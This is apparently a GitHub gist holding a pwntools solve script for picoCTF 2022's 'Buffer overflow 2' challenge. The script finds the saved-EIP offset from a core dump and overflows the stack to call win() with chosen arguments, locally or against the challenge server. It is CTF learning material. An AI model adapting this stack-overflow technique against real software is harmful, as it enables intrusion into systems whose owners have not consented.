@jktrn
Last active June 17, 2022 04:56
pwntools solve script for the pwn/binary exploitation challenge "Buffer overflow 2" from the picoCTF 2022 competition.
from pwn import *

elf = context.binary = ELF('./vuln')  # sets context (arch, bits, endianness) from the binary and keeps the ELF object
host, port = 'saturn.picoctf.net', [PORT]  # remote instance; [PORT] is the author's placeholder for the challenge port

# Stage 1: crash the local binary with a cyclic pattern to learn the offset to the saved EIP
p = process(elf.path)  # creates local process from the elf object
p.sendline(cyclic(128))  # sends cyclic pattern to overflow the buffer and crash
p.wait()  # SIGSEGV generates a core dump (core dumps must be enabled, e.g. ulimit -c unlimited)
core = Coredump('./core')  # parses the core dump file (path depends on the system's core_pattern)

# Stage 2: build the payload: padding up to the saved EIP, then win(), a return address and the two arguments
payload = flat([
    {cyclic_find(core.eip): elf.symbols.win},  # pads up to the EIP offset, then places the address of win()
    elf.symbols.main,  # return address win() returns to when it finishes
    0xCAFEF00D,  # parameter 1
    0xF00DF00D   # parameter 2
])

# Stage 3: deliver the payload locally, or to the remote instance when run with REMOTE=1
if args.REMOTE:
    p = remote(host, port)
else:
    p = process(elf.path)
p.sendline(payload)
p.interactive()